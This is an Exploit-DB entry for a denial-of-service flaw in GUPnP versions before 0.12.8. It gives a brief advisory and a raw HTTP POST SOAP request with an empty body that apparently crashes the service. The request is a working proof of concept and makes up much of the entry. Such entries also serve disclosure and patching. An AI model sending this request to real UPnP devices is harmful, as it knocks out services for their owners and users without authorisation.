GUPnP 0.12.7 - Message Handling Denial of Service

EDB-ID:

33040


Type:

dos


Platform:

Linux

Date:

2009-05-03


source: https://www.securityfocus.com/bid/35390/info

GUPnP is prone to a vulnerability that remote attackers may exploit to cause denial-of-service conditions.

Versions prior to GUPnP 0.12.8 are affected. 

======== ACTION MESSAGE ==========
POST /Dimming/Control HTTP/1.1 SOAPAction: "urn:schemas-upnp-org:service:Dimming:1#GetLoadLevelStatus"
Host: www.example.com:41615 Content-Type: text/xml
Content-Length: 0
==================================